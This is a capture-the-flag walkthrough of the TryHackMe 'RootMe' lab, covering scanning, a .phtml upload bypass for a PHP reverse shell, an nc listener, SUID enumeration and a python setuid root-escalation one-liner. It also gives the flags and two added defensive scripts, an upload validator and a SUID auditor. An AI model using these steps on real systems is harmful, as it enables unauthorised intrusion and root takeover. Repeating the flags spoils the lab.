RootMe TryHackMe

performed by: jb-williams

Deploy the machine

Reconnaissance

  • To get info on the target, run this nmap command:
nmap -v -T4 -sV -sC -oA nmap/initial 10.10.105.101
  • This provides the answers to the following three questions.

Scan the machine, how many ports are open?

  • Answer: 2

What version of Apache is running?

  • Answer: 2.4.29

What service is running on port 22?

  • Answer: ssh

Find directories on the web server using the GoBuster tool.

  • To find directories you can use gobuster, but I prefer feroxbuster.
  • Here are the respective commands I would run:
gobuster dir -u http://10.10.105.101 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobust.txt -t 15
  • Since this (below) is my normal command, I also have it set to go through my web proxy so I can capture the requests/responses.
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.105.101/

What is the hidden directory?

  • Answer: /panel/

Getting a Shell

Find a form to upload and get a reverse shell, and find the flag.

  • With the feroxbuster scan I found both /panel/ and /uploads/
  • Traversing to http://<IP>/panel/, there seems to be a file upload page.
  • Tried uploading a reverse shell .php file from pentestmonkey. It would not allow that extension, so I attempted several other PHP file extensions.
  • After a few, I landed on being able to upload a .phtml file.
  • Then going to the previously mentioned http://<IP>/uploads/, you can see the previously uploaded files as a directory listing.
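The reason the .phtml upload worked is that the panel apparently blocked one extension (.php) rather than allowing only the types it actually needs, while Apache's PHP handler still executes .phtml. As an added example (my own code, not part of the original room or its upload form), here is the weak blocklist check beside a hardened validator: it allowlists the final extension, rejects any PHP-family extension anywhere in the name (so shell.php.jpg is also caught), verifies the file's magic bytes against the claimed type, and stores the file under a random name instead of the user-supplied one. The allowed image types and the PHP extension pattern are assumptions for illustration.

```python
import os
import re
import secrets
from typing import Tuple

# Constructed allowlist: the only types this hypothetical panel should accept.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# Extensions commonly mapped to the PHP handler by Apache configs
# (php, php5, phtml, phar, phps). Assumed pattern, adjust to your server config.
PHP_LIKE = re.compile(r"^\.ph(p\d?|tml|ar|ps)$", re.IGNORECASE)

# Leading magic bytes for each allowed type.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def weak_check(filename: str) -> bool:
    """Blocklist of the kind that let .phtml through: only '.php' is refused."""
    return not filename.lower().endswith(".php")


def strong_check(filename: str, content: bytes) -> Tuple[bool, str]:
    """Allowlist the final extension, refuse PHP-like extensions anywhere in the
    name, and require the content to start with the magic bytes of that type."""
    name = os.path.basename(filename)
    if "\x00" in name or name in ("", ".", ".."):
        return False, "invalid filename"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = ["." + p for p in parts[1:]]
    for ext in exts:
        if PHP_LIKE.match(ext):
            return False, "server-side script extension %s rejected" % ext
    final = exts[-1]
    if final not in ALLOWED_EXTENSIONS:
        return False, "extension %s not in allowlist" % final
    if not content.startswith(MAGIC[final]):
        return False, "content does not match claimed type"
    return True, "ok"


def storage_name(final_ext: str) -> str:
    """Random on-disk name; the user-controlled filename never reaches the filesystem."""
    return secrets.token_hex(16) + final_ext


if __name__ == "__main__":
    # Constructed sample uploads: a PHP payload with the bypass extension, and a real JPEG header.
    for fname, data in (("shell.phtml", b"<?php "), ("photo.jpg", b"\xff\xd8\xff\xe0")):
        print(fname, "weak:", weak_check(fname), "strong:", strong_check(fname, data))
```

The weak check returns True for shell.phtml, which is exactly the gap used above; the strong check refuses it on the extension alone and would also refuse a correctly named file whose bytes are PHP rather than an image.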

user.txt

  • Set up a listener with nc on the port you provided in the reverse shell:
nc -lvnp 4444
  • Then clicking on your .phtml reverse shell file in /uploads/ will give you a reverse shell on that server.
  • The task asks for user.txt; this locates the file, if one is present, and prints it:
cat $(find / -type f -iname user.txt 2> /dev/null)
  • If you cat that file you get the user flag.

  • Answer: THM{y0u_g0t_a_sh3ll}

Privilege Escalation

Search for files with SUID permission, which file is weird?

  • To find all SUID files, you can use this command:
find / -perm -4000 2>/dev/null
  • Looking through the output, using my local machine as a reference, this binary looks out of place.

  • Answer: /usr/bin/python
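Comparing against a local machine by eye is what the find command above leaves you with; the defender's version of the same step is to diff the setuid list against a known-good baseline and flag interpreters and shells separately, since a setuid bit on any of those hands out code execution as the file owner (which is why the python binary stands out here). As an added example (my own code, not from the room), this script does both: find_suid walks the filesystem like find / -perm -4000, and classify sorts the results into expected, unexpected, and critical. The BASELINE set is a constructed illustration, not a real distribution manifest; build it from a clean image of your own.

```python
import os
import stat
from typing import Dict, Iterable, List

# Constructed baseline of setuid binaries expected on a stock Ubuntu host.
# Illustrative only: generate the real one from a known-good image.
BASELINE = {
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/umount", "/bin/fusermount",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/traceroute6.iputils",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
}

# Interpreters and shells: setuid on any of these is code execution as the owner.
INTERPRETERS = ("python", "perl", "ruby", "bash", "sh", "dash", "zsh", "php", "node", "lua")

# Pseudo-filesystems that are not worth walking.
SKIP_DIRS = ("/proc", "/sys", "/dev", "/run")


def find_suid(root: str = "/") -> List[str]:
    """Return regular files under root with the setuid bit set (like find / -perm -4000)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)  # like find, do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def _interpreter_name(path: str) -> str:
    """Normalise names such as python3.6 or perl5.26 to python / perl."""
    base = os.path.basename(path)
    return base.split(".")[0].rstrip("0123456789")


def classify(paths: Iterable[str], baseline: Iterable[str] = BASELINE) -> Dict[str, List[str]]:
    """Split setuid paths into expected (in baseline), critical (an interpreter or
    shell not in baseline) and unexpected (anything else not in baseline)."""
    known = set(baseline)
    report: Dict[str, List[str]] = {"expected": [], "critical": [], "unexpected": []}
    for path in sorted(set(paths)):
        if path in known:
            report["expected"].append(path)
        elif _interpreter_name(path) in INTERPRETERS:
            report["critical"].append(path)
        else:
            report["unexpected"].append(path)
    return report


def audit_find_output(text: str) -> Dict[str, List[str]]:
    """Classify saved output of find / -perm -4000 (one path per line)."""
    return classify(line.strip() for line in text.splitlines() if line.strip())


if __name__ == "__main__":
    report = classify(find_suid("/"))
    for level in ("critical", "unexpected"):
        for path in report[level]:
            print("%s: %s" % (level, path))
```

Run it as a periodic check (cron, a config-management compliance test, or an EDR custom rule) and alert on anything in the critical or unexpected lists; for a file that should legitimately carry setuid, add it to the baseline deliberately rather than silencing the alert.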

Find a form to escalate your privileges.

  • Knowing that we have access to the SUID /usr/bin/python, the first thing I tend to do is check GTFOBins to see if there are any options there.
  • After attempting the one listed, I actually couldn't get it to work properly, so after looking at previous notes and trying different ways, I found these two commands each work depending on your shell preference.
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

or

python -c 'import os; os.execl("/bin/bash", "bash", "-p")'

root.txt

  • After using that python command, root access was given. Again they prompted us for root.txt; assuming it was in the /root directory, I just used cat on the absolute path.
  • You could also use this command if the file were not in the /root directory.
cat $(find / -type f -iname root.txt 2> /dev/null)
  • Answer: THM{pr1v1l3g3_3sc4l4t10n}

written and performed by jb-williams - github